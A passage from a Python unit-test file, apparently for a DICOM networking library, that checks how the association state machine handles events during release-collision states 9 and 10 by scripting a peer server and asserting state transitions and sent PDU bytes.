('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14'
]
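        # AR-9 sends an A-RELEASE-RP PDU: type 0x06, length 4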
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt15'
]
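        # AA-1 sends an A-ABORT PDU with source 0x00 (service-user initiated)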
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
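# The State 10 tests exercise the acceptor side of a release collision:
# get_acceptor_assoc() makes the local FSM take the acceptor path
# (Evt5/AE-5 -> Sta2, Evt6/AE-6 -> Sta3, Evt7/AE-7 -> Sta6), after which the
# local A-RELEASE-RQ (Evt11 -> AR-1 -> Sta7) collides with the peer's
# A-RELEASE-RQ (Evt12 -> AR-8 -> Sta10).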
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt3', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt4', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt6', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt10', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
